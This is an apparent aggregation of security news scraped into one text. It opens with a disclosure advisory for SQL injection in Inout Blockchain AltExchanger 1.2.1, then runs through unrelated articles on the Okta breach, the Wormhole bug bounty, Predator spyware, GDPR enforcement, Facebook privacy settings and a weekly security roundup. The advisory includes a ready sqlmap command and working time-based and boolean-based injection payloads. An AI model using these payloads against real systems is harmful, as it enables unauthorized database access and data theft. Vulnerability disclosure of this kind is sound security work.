Blockchain AltExchanger version 1.2.1 suffers from multiple remote SQL injection vulnerabilities.

# Information```Vulnerability Name : Multiple Remote SQL Injections in Inout Blockchain AltExchangerProduct : Inout Blockchain AltExchangerversion : 1.2.1Date : 2022-05-21Vendor Site : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/Exploit Detail : https://github.com/bigb0x/CVEs/blob/main/Blockchain-AltExchanger-121-sqli.mdCVE-Number : In ProgessExploit Author : Mohamed N. Ali @MohamedNab1l``` # Description Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure. ## 1- Vulnerable Parameter: symbol (GET) Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php ### Sqlmap command:`python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db` ### output:`Parameter: symbol (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO[16:43:22] [INFO] testing MySQL[16:43:23] [INFO] confirming MySQL[16:43:26] [INFO] the back-end DBMS is MySQL[16:43:26] [INFO] fetching banner[16:43:26] [INFO] resumed: 5.6.50web application technology: PHP 7.0.33back-end DBMS: MySQL >= 5.0.0banner: '5.6.50'[16:43:26] [INFO] fetching current database[16:43:26] [INFO] retrieved: inout_blockchain_altexchanger_dbcurrent database: 'inout_blockchain_altexchanger_db'` <img src="./resources/Blockchain-AltExchanger-121-sqli-1.png"> ## 2- Vulnerable Parameter: marketcurrency (POST) Vulnerability File: /index.php/coins/update_marketboxslider ### HTTP Request:----------------------------------------------------`POST /index.php/coins/update_marketboxslider HTTP/1.1Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://vulnerable-host.com/Cookie: inoutio_language=4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brContent-Length: 69User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36Host: vulnerable-host.comConnection: Keep-alivedisplaylimit=4&marketcurrency=-INJEQT-SQL-HERE`---------------------------------------------------- ## 3- Vulnerable Parameter: Cookie: inoutio_language (GET) Vulnerability File: /index.php ### HTTP Request:----------------------------------------------------`GET /index.php/home/about HTTP/1.1Referer: https://www.google.com/search?hl=en&q=testingUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36x-requested-with: XMLHttpRequestCookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brHost: vulnerable-host.comConnection: Keep-alive`---------------------------------------------------- ## Timeline```2022-05-03: Discovered the bug2022-05-03: Reported to vendor2022-05-21: Advisory published``` ## Discovered by```Mohamed N. Ali@MohamedNab1lali.mohamed at gmail.com```

Blockchain AltExchanger 1.2.1 SQL Injection

What subsequent protections do you have in place when your first line of defense goes down?

News that Okta was hacked by the Lapsus$ group in January has caused serious waves in the identity security space.

With the company considered a pillar of security, the confirmed hack of Okta has led many to question the wisdom of being so dependent on their identity manager. Interestingly, many are asking how to move past having a single source of truth for our access control that can also be a single source of failure.

For an industry focused on zero trust, there's a lot of faith put into a couple of security pillars. So what happens when they get knocked? Does the rest of our security infrastructure come crashing down?

**Identity at the Center of Security  
**For many organizations, Okta is the go-to for everything access security when it comes to identity.

These identity providers (IdPs) help organizations manage their identity directories, offer authentication services like single sign-on and multifactor authentication (MFA), and generally make it easier for dealing with the on- and offboarding of employees in the organization.

All great things.

The problem comes when we place way too much trust in any one solution because it can become a single point of failure.

The question becomes: What do you have in place to pick up the baton of security when the first line of defense goes down?

**Guarding the Guardians  
**Even under normal circumstances, we only see the access that we have provisioned ourselves through our IdPs or identity governance and administration (IGA) tools.

If our IdP is compromised, and therefore untrusted, then how are we validating the information that it is providing?

What we need is additional layers of security and visibility. There should be a segregation of duties between the infrastructure that manages our access and the tools that validate that access.

Our tools have to tell us not only what we think we have, but what are really facts in the field that can impact our security.

The way to achieve this is through extensive connectivity with all your organization's apps and services. It is not enough to have visibility in your AWS if your users are also utilizing GitHub, Google Docs, and many other cloud services that businesses depend on for day-to-day work.

We need to see all of the activity happening not only with our identities, but also from the asset side to see which nonfederated (local IAM/external users/service principals) are accessing our assets.

If we can understand how access privileges are being used, then we can pick up on suspicious activity and reduce our exposure with least privilege.

Credentials will be compromised and accounts taken over. Here are three ways we can limit the damage and make it harder for hackers to reach their objectives.

**1. Reduce Your Exposure  
**Avoid those self-inflicted wounds by plugging basic holes in your security. Make sure that every admin user has MFA enabled. It's not perfect, but it is a helpful barrier to make them work harder and can prevent 99.9% of the attacks.

Revoke unused privileges. If an identity has not used a privilege in 30 or 60 days, then they probably do not need it for their day-to-day work.

Perform periodic access reviews where managers and app owners have to approve or revoke access privileges for employees and others. Provide them with the sufficient data to make accurate decisions and avoid rubber stamping. Do these periodically to ensure that everyone has the right baseline level of access.

**2\. Continuously Monitor For Issues  
**Once you have a secure baseline of access privileges, you have to continuously monitor that it stays that way.

The way to do it is with policies that can be monitored and alerted on if violations occur. For example if a new admin is created or an access privilege has not been used in 30 days.

Setting enforceable guardrails will enable you to respond quickly and avoid privilege sprawl or risky exposures.

**3. Secure Your Supply Chain  
**Make sure that everyone in your supply chain or other partners are keeping to your standards.

If a mistake or failure to follow best practices on the part of your third party-vendor impacts your customers, it becomes your responsibility to inform them of your expectations and enforce them.

You can pick your metaphor, but a defense-in-depth approach requires that we not put all of our eggs in one product basket or another. Every solution has its limitations and can only play a part in the overall security array.

While authentication and IdP tools are essential first steps, they provide identity and access infrastructure. We need to ask what's happening in the infrastructure and monitor it to become more resilient and ensure that a mistake with a single vendor will not leave us exposed.

After the Okta Breach, Diversify Your Sources of Truth

Critical security flaw patched on the same day it was submitted

Critical security flaw patched on the same day it was submitted

An ethical hacker has earned a record $10 million bug bounty reward after discovering a critical security vulnerability in the Wormhole core bridge contract on Ethereum.

Wormhole is a decentralized, universal message-passing protocol that enables interoperability between blockchains such as Ethereum, Terra, and Binance Smart Chain (BSC).

**Held to ransom**

An attacker exploiting the vulnerability “could have held the entire protocol \[to\] ransom with the threat that the Ethereum Wormhole bridge would be bricked, and all the funds residing in that contract lost forever”, according to a proof of concept (PoC) posted to GitHub by Immunefi.

The PoC also noted that “$736 million worth of assets \[were\] residing in the contract at the time of submission”.

Wormhole awarded the maximum payout under its Immunefi-hosted bug bounty program to a bug hunter with the online pseudonym ‘satya0x’.

Catch up and the latest bug bounty news and analysis

The flaw, described as “an upgradeable proxy implementation self-destruct bug”, was validated and patched on February 24, the same day Satya0x reported the issue.

**Behind the bug**

The Wormhole vulnerability arose after an implementation for a Universal Upgradeable Proxy Standard (UUPS) proxy “was uninitialized after a previous bugfix had reverted the original initialization, which meant an attacker could pass their own Guardian set and proceed with the upgrade as a Guardian they controlled”, according to a blog post published by Immunefi.

RECOMMENDED US revises policy regarding Computer Fraud and Abuse Act, will not prosecute good faith research

An attacker could then force an upgrade attempt with , causing a to an attacker-submitted address, which by executing a opcode could destroy the implementation contract.

“I am proud to have played a role in mitigating a serious vulnerability and a systemic threat to the ecosystem,” said Satya0x, who praised Wormhole’s handling of “the entire bug bounty process” and Immunefi as “a knowledgeable, visible, and credibly neutral third party”.

**Blockchain bonanza**

The motive for offering such a huge reward is illustrated by the frequent, enormous losses resulting from successful hacks of Decentralized Finance (DeFi) platforms – not least the $325 million stolen from Wormhole itself earlier this year.

The payout eclipses the previous bug bounty record – a $2 million reward paid by blockchain technology company Polygon to ethical hacker Gerhard Wagner in October 2021 for a ‘double spend’ vulnerability.

Read more of the latest blockchain security news

To put the Wormhole reward into even sharper perspective, the sum is larger than the total amount paid out across all Google Vulnerability Reward Programs (VRPs) in 2021, $8.7 million.

MakerDAO, another decentralized finance (DeFi) platform, is also offering a potential maximum payout of $10 million.

RECOMMENDED UK government sits out bug bounty boom but welcomes vulnerability disclosure

Blockchain bridge Wormhole pays record $10m bug bounty reward

An update for the maven:3.5 module is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-29599: maven-shared-utils: Command injection via Commandline class


RHSA-2022:4699: Red Hat Security Advisory: maven:3.5 security update

By Deeba Ahmed
Spyware developer firm Cytrox is under Google’s radar for developing exploits against five 0-day flaws in Android and…
This is a post from HackRead.com Read the original post: Predator Spyware Using Zero-day to Target Android Devices

Spyware developer firm Cytrox is under Google’s radar for developing exploits against five 0-day flaws in Android and Chrome.

On Thursday, May 19th, Google’s Threat Analysis Group (TAG) reported that spyware developer/vendor Cytrox had developed exploits against five zero-day vulnerabilities to target Android users with spyware.

According to the details shared by TAG, threat actors are using the infamous Predator spyware in three different campaigns. Predator was previously analyzed in a report from the University of Toronto’s Citizen Lab.

**0-days used with n-days to Deploy Spyware**

The exploits are developed for four Chrome 0-days and one Android 0-day flaw. In their blog post, TAG researchers Clement Lecigne and Christian Resell explained that the 0-days are used in conjunction with n-day exploits.

Moreover, the attackers are trying to benefit from the time difference between the patching of some critical bugs, which weren’t declared severe security issues, and “when these patches were fully deployed across the Android ecosystem.”

**Spyware Details**

According to Google, the North Macedonian-based commercial surveillance firm Cytrox has packaged and sold the exploits to different state-backed threat actors in Greece, Egypt, Serbia, Madagascar, Indonesia, Spain, Côte d’Ivoire, and Armenia.

It is alleged that the buyers have used these bugs in at least three campaigns so far. The Predator spyware is similar to NSO Group’s Pegasus spyware, allowing threat actors to penetrate Android and iOS devices.

**About the Three Campaigns using Predator**

TAG examined three campaigns and concluded that attackers send one-time URLs to Android users through spear-phishing emails. These links are shortened using a common use URL shortener while the attackers target only a handful of victims. When users click on this malicious URL, they are redirected to a malicious webpage that automatically deploys the exploits and redirects them to a legitimate website.

Once there, the attackers deploy Alien Android malware that loads Cytrox’s Predator. In case the shortened link doesn’t work, the victim is directly taken to the legit website.

**List of Exploits**

Here’s the list of the 0-day flaws exploited by attackers in Chrome and Android:

*   CVE-2021-1048
*   CVE-2021-37973
*   CVE-2021-37976
*   CVE-2021-38000
*   CVE-2021-38003

The primary aim of attackers behind this operation is distributing Alien malware that is a precursor for deploying Predator spyware onto infected devices. It receives commands from Predator through an IPC (inter-process communication) mechanism and can record audio, hide apps, and add CA certificates to evade detection.

The first campaign was launched in August last year on Google Chrome, targeting the Samsung Galaxy S21 device. One month later, the second campaign targeted an updated Samsung Galaxy S10, while the third was detected in October 2021.

**More Android Spyware News**

1.  Fake Android Banking Apps Stealing Credentials Via Malware
2.  BRATA Android malware factory resets phones after stealing funds
3.  TangleBot Android malware hijacks phone to steal login credentials
4.  New Android malware TeaBot found stealing data, intercepting SMS
5.  New Russian Android Malware Tracks GPS Location and Spies on Victims

Predator Spyware Using Zero-day to Target Android Devices

The world-leading data law changed how companies work. But four years on, there’s a lag on cleaning up Big Tech.

One thousand four hundred and fifty-nine days have passed since data rights nonprofit NOYB fired off its first complaints under Europe’s flagship data regulation, GDPR. The complaints allege Google, WhatsApp, Facebook, and Instagram forced people into giving up their data without obtaining proper consent, says Romain Robert, a program director at the nonprofit. The complaints landed on May 25, 2018, the day GDPR came into force and bolstered the privacy rights of 740 million Europeans. Four years later, NOYB is still waiting for final decisions to be made. And it’s not the only one.

Since the General Data Protection Regulation went into effect, data regulators tasked with enforcing the law have struggled to act quickly on complaints against Big Tech firms and the murky online advertising industry, with scores of cases still outstanding. While GDPR has immeasurably improved the privacy rights of millions inside and outside of Europe, it hasn’t stamped out the worst problems: Data brokers are still stockpiling your information and selling it, and the online advertising industry remains littered with potential abuses.

Now, civil society groups have grown frustrated with GDPR’s limitations, while some countries’ regulators complain the system to handle international complaints is bloated and slows down enforcement. By comparison, the information economy moves at breakneck speed. “To say that GDPR is well enforced, I think it’s a mistake. It's not enforced as quickly as we thought,” Robert says. NOYB has just settled a legal case against the delays in its consent complaints. “There’s still what we call an enforcement gap and problems with cross-border enforcement and enforcement against the big players,” adds David Martin Ruiz, a senior legal officer at the European Consumer Organization, which filed a complaint about Google’s location tracking four years ago.

Lawmakers in Brussels first proposed reforming Europe’s data rules back in January 2012 and passed the final law in 2016, giving companies and organizations two years to fall in line. GDPR builds upon previous data regulations, super-charging your rights and altering how businesses must handle your personal data, information like your name or IP address. GDPR doesn’t ban the use of data in certain cases, such as police use of intrusive facial recognition; instead, seven principles sit at its heart and guide how your data can be handled, stored, and used. These principles apply equally to charities and governments, pharmaceutical companies and Big Tech firms.

Crucially, GDPR weaponized these principles and handed each European country’s data regulator the power to issue fines of up to 4 percent of a firm's global turnover and order companies to stop practices that violate GDPR's principles. (Ordering a company to stop processing people’s data is arguably more impactful than issuing fines.) It was never likely that GDPR fines and enforcement were going to flow quickly from regulators—in competition law, for instance, cases can take decades—but four years after GDPR started, the total number of major decisions against the world’s most powerful data companies remains agonizingly low.

Under the dense series of rules that make up GDPR, complaints against a company that operates in multiple EU countries are usually funneled to the country where its main European headquarters are based. This so-called one-stop-shop process dictates that the country leads the investigation. The tiny nation of Luxembourg handles complaints against Amazon; the Netherlands deals with Netflix; Sweden has Spotify; and Ireland is responsible for Meta’s Facebook, WhatsApp, and Instagram, plus all of Google’s services, Airbnb, Yahoo, Twitter, Microsoft, Apple, and LinkedIn.

A glut of early and complex GDPR complaints has led to backlogs at regulators, including the Irish body, and international cooperation has been slowed down by paperwork. Since May 2018, the Irish regulator has completed 65 percent of cases involving cross-border decisions—400 are outstanding, according to the regulator's own stats. Other cases, launched by NOYB against Netflix (Netherlands), Spotify (Sweden), and PimEyes (Poland) have all also dragged on for years.

Europe’s data regulators claim GDPR enforcement is still maturing and that it is working well and improving over time. (Officials from France, Ireland, Germany, Norway, Luxembourg, Italy, the UK, and Europe’s two independent bodies, the EDPS and EDPB, were all interviewed for this article.) The number of fines has ramped up as the legislation has aged, hitting a running total of €1.6 billion (around $1.7 billion). The biggest? Luxembourg fined Amazon €746 million ($790 million), and Ireland fined WhatsApp €225 million ($238.5 million) last year. (Both companies are appealing the decisions). At the same time, one lesser-known Belgian fine could change how the entire ad tech industry works. However, officials concede that changes to the way GDPR is enforced could speed up the process and ensure swifter action.

Helen Dixon is at the heart of Europe’s GDPR enforcement, with the Irish Data Protection Commission (DPC) responsible for an outsized number of Big Tech firms. The DPC has faced criticism for struggling to keep up with the number of complaints under its purview, drawing ire from fellow regulators and calls to reform the body. “If everything comes at you at the same time, clearly there’s going to be a lag in terms of prioritizing and dealing sequentially with the issues while standing up what is a very significant legal framework,” Dixon says, defending her office’s performance. Dixon says the DPC has had to handle GDPR’s complexity from scratch, leading to many cases and new processes, and there aren’t simple answers for many of them.

“I would classify the DPC as being very effective in the first four years of application of the GDPR,” Dixon says. “The fact that DPC has stood up a new legal framework that many described as 'the law of everything' in a couple of short years, and implemented what are very significant sanctions in the form of fines and corrective measures already in that time period” shows its success, Dixon says. The organization has enforced measures against Twitter, WhatsApp, Facebook, and Groupon, among thousands of national cases, during this time.

“There should be an independent review of how to reform and strengthen the DPC,” says Johnny Ryan, a senior fellow at the Irish Council for Civil Liberties. “We cannot know from outside what the problems are.” Ryan adds that blame can’t just be leveled at the Irish regulator. “The European Commission has immense power. The GDPR is supposed to be an immense project. And the Commission has neglected the GDPR,” he says. “It doesn't just propose the laws, it also has to see that they are applied.”

So far, the European Commission has backed enforcement of GDPR in Ireland and across the continent. “The Commission has consistently called on data protection authorities to continue stepping up their enforcement efforts,” Didier Reynders, the European Commissioner for Justice, says in a statement. “We have launched six infringement procedures under the GDPR.” These legal cases include action against Slovenia for failing to import GDPR into its national law and questioning the independence of the Belgian data authority.

However, following a complaint from Ryan in February, the EU Ombudsman, a watchdog for European institutions, opened an inquiry into how the Commission has been monitoring data protection in Ireland. (The Ombudsman says the Commission has until May 25 to reply, after asking for its initial deadline to be extended. Reynders says the Commission does not comment on ongoing inquiries). If the Commission does look into Ireland, it could make recommendations, says Estelle Massé, the global data protection lead at Access Now, a technology-focused civil rights organization. “There is an issue, and if you don't intervene in this way, I don’t really see how the situation will resolve,” Massé says. “It has to go through an infringement procedure.”

Despite clear enforcement problems, GDPR has had an incalculable effect on data practices broadly. EU countries have made decisions in thousands of local cases and issued guidance to organizations to say how they should use people’s data. Spain’s LaLiga soccer league was fined after its app spied on users, retailer H&M was fined in Germany after it saved details about employees’ personal lives, the Netherlands’ tax body was fined over its use of a ‘blacklist,’ and these are just a handful of the successful cases.

Some of GDPR’s impact is also hidden—the law isn’t just about fines and ordering companies to change—and it has improved company behaviors. “If you compare the awareness about cybersecurity, about data protection, about privacy, as it looked like 10 years ago and it looks today, these are completely different worlds,” says Wojciech Wiewiórowski, the European Data Protection Supervisor, who oversees GDPR cases against European institutions, such as Europol.

Companies have been put off using people’s data in dubious ways, experts say, when they wouldn’t have thought twice about it pre-GDPR. One recent study estimated that the number of Android apps on Google’s Play store has dropped by a third since the introduction of GDPR, citing better privacy protections. “More and more businesses have allocated significant budgets to doing data protection compliance,” says Hazel Grant, head of the privacy, security, and information group at London-headquartered law firm Fieldfisher. Grant says that when GDPR decisions are made—such as Austria’s decision to make the use of Google Analytics unlawful—companies are concerned about what it means for them. “Four or five years ago, that enforcement wouldn't have happened,” Grant says. “And if it had happened, maybe a few data protection lawyers would have known about it—it wouldn't have been out there with clients coming to us saying we need advice on this.”

But at Big Tech levels where data is plentiful, the scale of complying with GDPR is different. One recent internal Facebook document obtained by Motherboard hints that the company doesn't really know what it does with your data—an assertion Facebook denied at the time. Equally, a WIRED and _Reveal_ joint investigation at the end of 2021 found serious shortcomings in the ways Amazon handles customer data. (Amazon said it had an “exceptional” track record in protecting data.)

Microsoft declined a request to comment. Neither Google nor Facebook provided comment in time for publication.

“There is a lag, especially on Big Tech, enforcing the law on Big Tech—and Big Tech means cross-border cases, and that means the one-stop-shop and the cooperation among the data protection authorities,” says Ulrich Kelber, the head of the German federal data protection regulator. The one-stop-shop allows all of Europe’s regulators to have a say on the final decision of the lead regulator in that case, which can then be challenged. Ireland’s fine against WhatsApp grew from the original proposed penalty of as little as €30 million ($31.8 million) to €225 million ($238.5 million) after other regulators weighed in. Another Irish case against Instagram is currently being discussed, Dixon says, which will add months to its final outcome.

The one-stop-shop was created under GPDR, meaning the process has started with teething problems, but four years in, a lot still needs to be improved. Tobias Judin, the head of international at Norway’s data protection authority, says that each week several drafts of decisions are circulated among Europe’s data regulators. “In the vast majority of those cases, we actually agree,” Judin says. (German authorities object the most.) Decisions can face a lot of back and forth between regulators, wrapped up in bureaucracy. “We do question whether, in those cases that have a European-wide impact, it makes sense and whether it is feasible that these cases are solely dealt with by one data protection authority until we reach the decision stage,” Judin says.

Luxembourg’s data regulator hit Amazon with a record-breaking €746 million ($790.6 million) fine last year, its first case against the retailer. Amazon is contesting the fine in court—in a statement to WIRED, the company repeated its assertion that “there has been no data breach, and no customer data has been exposed to any third party”—but Luxembourg’s regulator says investigations will always be lengthy despite it bringing in new ways to investigate companies. “I think under one year or one-half year, I think it’s almost impossible to have it closed before such a delay,” says Alain Herrmann, one of Luxembourg’s four data protection commissioners. “There are huge \[amounts of\] information to deal with.” Herrmann says Luxembourg has a few other international cases ongoing, but national secrecy laws prevent it from talking about them. “It’s just the \[one-stop-shop\] system, the lack of resources, the lack of clear law and procedure, which makes their job even more difficult,” Robert says.

The French data regulator has, in some ways, sidestepped the international GDPR process by directly pursuing companies’ use of cookies. Despite common beliefs, annoying cookie pop-ups don’t come from GDPR—they’re governed by the EU’s separate E-Privacy law, and the French regulator has taken advantage of this. Marie-Laure Denis, the head of French regulator CNIL, has hit Google, Amazon, and Facebook with hefty fines for bad cookie practices. Perhaps more importantly, it has forced companies to change their behavior. Google is altering its cookie banners across the whole of Europe following the French enforcement.

“We are starting to see really concrete changes to the digital ecosystems and evolution of practices, which is really what we are looking \[for\],” Denis says. She explains that CNIL will next look at data collection by mobile apps under the E-Privacy law, and cloud data transfers under GDPR. The cookie enforcement effort wasn’t to avoid GDPR’s protracted process, but it was more efficient, Denis says. “We still believe in the GDPR enforcement mechanism, but we need to make it work better—and quicker.”

In the last year, there have been growing calls to change how GDPR works. “Enforcement should be more centralized for big affairs,” Viviane Redding, the politician who proposed GDPR back in 2012, said of the data law in May last year. The calls have come as Europe passed its next two big pieces of digital regulation: the Digital Services Act and the Digital Markets Act. The laws, which focus on competition and internet safety, handle enforcement differently from GDPR; in some instances, the European Commission will investigate Big Tech companies. The move is a nod to the fact that GDPR enforcement may not have been as smooth as politicians would have liked.

There appears to be little appetite to reopen GDPR itself; however, smaller tweaks could help improve enforcement. At a recent meeting of data regulators held by the European Data Protection Board, a body that exists to guide regulators, countries agreed that some international cases will work to fixed deadlines and timelines and said they would try to “join forces” on some investigations. Norway’s Judin says the move is positive but questions how effective it will be in practice.

Massé, from Access Now, says a small amendment to GDPR could significantly address some of the biggest current enforcement problems. Legislation could ensure data protection authorities handle complaints in the same way (including using the same forms), explicitly lay out how the one-stop-shop should work, and make sure that procedures in individual countries are the same, Massé says. In short, it could clarify how GDPR enforcement should be handled by every country.

The view is also shared by data regulators, at least to some degree. France’s Denis says regulators should share more information, more quickly on cross-border cases so they can build up an informal consensus around a potential decision. “The Commission could also, for example, look at resources given to data protection authorities,” Denis says. “Because it’s a member state’s obligation to give sufficient resources to data protection authorities to carry out their duties.” The staff and resources regulators have to investigate and enforce is dwarfed by those of Big Tech.

“Potentially, if there was the possibility for some kind of an instrument specific to the GDPR—being a legal instrument—that would specify certain process and procedural issues, that might assist,” Ireland’s Dixon says. She adds that complications that could be ironed out include issues around access to files during investigations, whether those making the complaints are given access to the investigation process, and problems in translations. “There’s a whole range of inconsistencies around that, giving rise to delays and dissatisfaction on all sides,” Dixon says.

Without some changes—and strong enforcement—civil society groups warn that GDPR could fail to stop the worst practices of Big Tech companies and improve people’s sense of privacy. “The immediate thing that needs to be addressed is the Big Tech firms,” Ryan says. “If we cannot deal with Big Tech, we will create a permanence to the fatalism that people feel about privacy and data.” Four years in, Massé says she still has hope for GDPR enforcement. “It's really not what we had hoped for. But it’s also not in a place that I think we can start digging a grave for the GDPR and forget about it.”

How GDPR Is Failing

The XML Sitemap Generator for Google WordPress plugin before 2.0.4 does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.

CVE-2022-0346

You don't want just anyone in your inbox. Here's how to take control.

When it comes to Facebook, most of us will have a contacts list covering years and even decades of our lives—recent acquaintances among people we've known since high school, neighbors we saw yesterday right next to old family friends we haven't seen since we were much younger.

Whatever you think about Facebook, there's no doubting its reach, and with billions of people on the platform it's important that you're contactable only to the people that you'd like to hear from.

The good news is that Facebook has plenty of tools and options to help you with this, and we've outlined the most important below. This is best done in a desktop web browser, where you can easily access all of the relevant Facebook settings.

Limiting Who Can Find You

It's possible to limit who can find you on Facebook.

Facebook via David Nield

(Facebook via David Nield)

If other people can't find you, they can't contact you. If you go to the Facebook Privacy Checkup page and choose **How people can find you on Facebook**, you can go step by step through the relevant settings. With friend requests, for example, you can allow anyone on Facebook to ask to be connected to you, or limit it to friends of friends—that means only those people who already know someone you're linked to will be able to send you a friend request.

You can also set whether people can find you via your email address and phone number. (If your details are in someone's phone contacts, Facebook might suggest you as a friend to them.) If you want to, you can keep these details private, so no one can find you via these pieces of information.

The final option in this particular section of the Facebook settings lets you decide whether you want your profile to be visible on search engines. If you'd rather your Facebook profile didn't pop up when someone types your name into Google, turn off the toggle switch next to **Do you want search engines outside Facebook to link to your profile?** before clicking on **Next** to review your settings.

Limiting Who Can See What You Share

You can set the audience for each Facebook post you share.

Facebook via David Nield

If other people can't see what you're sharing on Facebook, they can't comment on it or react to it. Every time you post something on the social network, you get what's called an audience selector menu—the drop-down just above the area where you compose the message that you want to post.

From the Facebook Privacy Checkup page on the web, you can click **Who can see what you share** to choose what the default setting is for this audience selector. If you want your posts to be seen only by a certain group of people, or by everyone on Facebook except for a few contacts, you can configure this here.

There's also a section called **Limit past posts**. If you click the **Limit** button underneath it, any older posts that were shared with an audience of friends of friends or indeed anyone on the web will be locked down so only your current Facebook friends can view them.

Facebook Messenger

Choose what happens with messages from people you don't know.

Facebook via David Nield

Anyone you’re Facebook friends with can send you a direct message via Facebook Messenger, so if you don't want this to happen then you need to unfriend or block them. (See below for more details on this.)

Anyone else who's on Facebook can message you too, but these messages don't go directly to your inbox: Instead, they go to a message requests folder. On the desktop interface or inside the mobile app, click or tap your profile picture (top left), then pick **Message requests** to see these messages. You can reply to these messages to continue the conversation, or ignore or delete them.

From the mobile Messenger app, tap your profile picture then **Privacy** and **Message delivery** to decide whether friends of friends and non-friends on Facebook can send you message requests at all.

Unfriending and Blocking

Blocking someone on Facebook takes only a few minutes.

Screenshot: Facebook via David Nield

Friends that you are connected to on Facebook can contact you much more easily than people who aren't. To sever a connection with someone, visit their profile page on Facebook and click **Friends** then **Unfriend**.

For people who you absolutely do not want to hear from on Facebook, use the block feature. Blocked individuals won't be able to see what you post on Facebook, they won't be able to tag you, they won't be able to message you, and they won't be able to add you to events. If you block someone, they won't be notified, but they may notice they can no longer be friends with you or get in touch with you.

To block someone, from the Facebook settings page click **Blocking**, then choose **Edit** next to **Block users**. Select **Add to Blocked List**, then enter the name of the person you no longer want to hear from, then choose **Block**. You can unblock people if you change your mind, but you'll have to then manually add them as friends again.

How to Limit Who Can Contact You on Facebook

Plus: The Conti ransomware gang shuts down, Canada bans Huawei and ZTE, and more of the week’s top security news.

As Russia’s full-scale war in Ukraine heads towards its hundredth day, opposition from Ukrainian forces is as strong as ever. At the same time, hacktivists all around the world continue to breach Russian institutions and publish their files and emails. This week one hacktivist collective took a different—and slightly peculiar—approach: launching a service to prank-call Russian government officials. The new website uses leaked details to put two random Russian officials on a call with each other. It obviously won't make any difference to the outcome of the war, but the group that created it hopes the tool will cause some confusion and annoy those in Moscow.

New research from Google’s Threat Analysis Group has delved into the surveillance-for-hire industry and found that spyware vendors are targeting Android devices with zero-day exploits. State-sponsored actors in Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain, and Indonesia have all purchased hacking tools from the North Macedonian firm Cytrox, the Google team says. The malware has used five previously unknown Android exploits, alongside unpatched vulnerabilities. Overall, Google’s researchers say they’re tracking more than 30 surveillance-for-hire firms around the world.

In other malware news, academics at Germany’s Technical University of Darmstadt have figured out a way to track an iPhone’s location even when it is turned off. When you switch your iPhone off it doesn’t fully power down—instead chips inside run in a low-power mode. The researchers were able to run malware that can track the phone in this low-power mode. They believe their work is the first of its kind, but the method is unlikely to be much of a threat in the real world, as it first requires jailbreaking the targeted iPhone, which has generally become harder to do in recent years.

But wait, there's more. We’ve rounded up all the news that we didn’t break or cover in depth this week. Click on the headlines to read the full stories. And stay safe out there.

International sanctions imposed against North Korea, for its continued development of nuclear weapons and ballistic missiles, mean the nation can’t trade with other countries or bring outside money within its borders. To get around this, in recent years Pyongyang has allowed its state-affiliated hackers to raid cryptocurrency platforms and rob banks. Now the FBI, the US Department of State, and the US Treasury have warned that thousands of North Korea’s IT workers—including app and software developers—have been freelancing at businesses around the world and sending money home. Many of them are based in China or Russia, the officials say. The risks of hiring North Korean workers range from “theft of intellectual property, data, and funds to reputational harm and legal consequences, including sanctions under both US and United Nations authorities.”

In a significant public move, the US Department of Justice says it will stop prosecuting security researchers under the Computer Fraud and Abuse Act. “Computer security research is a key driver of improved cybersecurity,” deputy attorney general Lisa Monaco said in a statement. For years the anti-hacking CFFA law has been criticized for its broad scope and its potential to be abused by prosecutors. While the DOJ’s explicit shift in policy will be welcomed by researchers, as _Motherboard_ reports, the policy doesn’t go far enough and still can put legitimate researchers at risk.

The mostly Russia-based Conti ransomware gang has had a dreadful few months. After backing Vladimir Putin’s war in Ukraine, thousands of its internal messages and innermost secrets were published online. While the gang has continued to target victims, including Costa Rica’s government, researchers now say Conti has officially shut down its operations. Conti’s Tor admin panels have been taken offline, and the group’s members are splintering off into other ransomware groups, according to security firm Advanced Intel. The shutdown comes after the US government offered a $15 million reward for information about Conti's members.

Canada has become the final country in the Five Eyes intelligence group—which also includes the US, UK, Australia, and New Zealand—to ban the use of Huawei’s telecoms equipment in its 5G networks. Fellow Chinese telecom firm ZTE is also included in the ban. The Canadian government, in an announcement, cited national security concerns and the fact that companies could be forced to comply with orders from “foreign governments.” Starting in September, Canadian firms will be banned from buying new 4G and 5G equipment from the Chinese companies. They must remove all existing 5G equipment by the summer of 2024, and 4G equipment must be removed by the end of 2027.

North Korean IT Workers Are Infiltrating Tech Companies

